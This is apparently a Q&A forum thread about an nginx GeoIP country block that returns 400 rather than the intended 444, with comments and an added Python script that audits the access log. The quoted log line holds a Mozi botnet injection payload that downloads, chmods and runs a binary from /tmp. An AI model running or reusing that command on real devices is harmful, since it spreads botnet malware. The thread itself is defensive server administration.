
I am trying to implement a country block with a map on an nginx web server.

This is my server configuration:

include snippets/ban-country-codes.conf;
include snippets/ban-user-agent.conf;

server {
    listen 80 default_server;
    server_name _;

    # Disallow access based on GeoIP
    if ($allowed_country = no) {
        return 444;
    }

    # Disallow access based on user agent
    if ($allowed_useragent = no) {
        return 444;
    }

    access_log /var/log/nginx/dehydrated80.access.log combinedplusgeoip;
    error_log /var/log/nginx/dehydrated80.error.log;

    location ^~ /.well-known/acme-challenge {
        default_type "text/plain";
        auth_basic "off";
        alias /var/www/dehydrated;
    }

    # redirect all other urls to https
    location / {
        return 301 https://$host$request_uri;
    }
}

and this is the snippet that implements the ban (snippets/ban-country-codes.conf):

map $geoip_country_code3 $allowed_country {
    '' no;
    CHN no;
    default yes;
}

In theory nginx should return 444 (close the connection) for clients from CHN and for clients with no geo identification.

Unfortunately I see this in my log (custom format combinedplusgeoip, a combined format to which I added the GeoIP information):

<ipaddress> CHN - - [14/Oct/2020:11:02:37 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 166 "-" "-"

The server responds with a 400 (of course, it's a malicious request) instead of the expected 444.

How is it possible?

Sandro B.
    A bad request means that Nginx doesn't understand and hasn't got as far as processing the request through your `server` blocks before rejecting it outright. – Richard Smith Oct 14 '20 at 09:49
  • If your server is CentOS or RHEL >= 7, you can use [`fds block China`](https://github.com/dvershinin/fds), which is capable of blocking countries on the level of FirewallD. Then no requests will reach NGINX in the first place. – Danila Vershinin Oct 14 '20 at 14:17
  • Thank you @RichardSmith ! – Sandro B. Oct 15 '20 at 12:30
  • @DanilaVershinin ... no, it's a Debian... I would work with fail2ban to implement different policies according to country and error rates... – Sandro B. Oct 15 '20 at 12:30
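As an added example (not from the question or its comments), a Python audit of the asker's combinedplusgeoip log that separates the two cases Richard Smith's comment distinguishes: 444s produced by the map, and 400s that nginx emitted before any `server` block ran, so the map and `if` never saw them. The field order of the custom log format and the sample log lines are assumptions constructed for this example.

```python
import re
from collections import Counter

# Assumed layout of the asker's "combinedplusgeoip" format: the standard combined
# format with $geoip_country_code3 inserted after the client address. nginx logs
# an empty variable (unknown country) as "-".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<country>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Countries the map sends to "no": CHN and the empty code (logged as "-").
BLOCKED = {"CHN", "-"}

# Constructed sample lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = r"""
203.0.113.10 CHN - - [14/Oct/2020:11:02:37 +0200] "GET /index.html HTTP/1.0" 444 0 "-" "-"
203.0.113.11 CHN - - [14/Oct/2020:11:02:38 +0200] "\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03" 400 166 "-" "-"
198.51.100.7 - - - [14/Oct/2020:11:03:01 +0200] "GET / HTTP/1.1" 444 0 "-" "-"
192.0.2.44 ITA - - [14/Oct/2020:11:03:12 +0200] "GET / HTTP/1.1" 301 169 "-" "curl/7.68.0"
192.0.2.45 ITA - - [14/Oct/2020:11:03:15 +0200] "GET /.well-known/acme-challenge/token HTTP/1.1" 200 87 "-" "-"
192.0.2.46 DEU - - [14/Oct/2020:11:04:00 +0200] "GET /%ZZ HTTP/1.1" 400 166 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def audit(log_text, blocked=BLOCKED):
    """Count (country, status) pairs and list blocked-country hits not closed with 444."""
    counts = Counter()
    leaks = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        counts[(rec["country"], rec["status"])] += 1
        if rec["country"] in blocked and rec["status"] != 444:
            # A 400 was rejected by the HTTP parser before virtual-host processing,
            # so the country map could not act; anything else reached the server block.
            reason = "rejected pre-routing (400)" if rec["status"] == 400 else "reached server block"
            leaks.append((rec["ip"], rec["country"], rec["status"], reason))
    return counts, leaks


if __name__ == "__main__":
    counts, leaks = audit(SAMPLE_LOG)
    for (country, status), n in sorted(counts.items()):
        print(f"{country:>4} {status} {n}")
    for leak in leaks:
        print("not blocked by map:", leak)
```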

0 Answers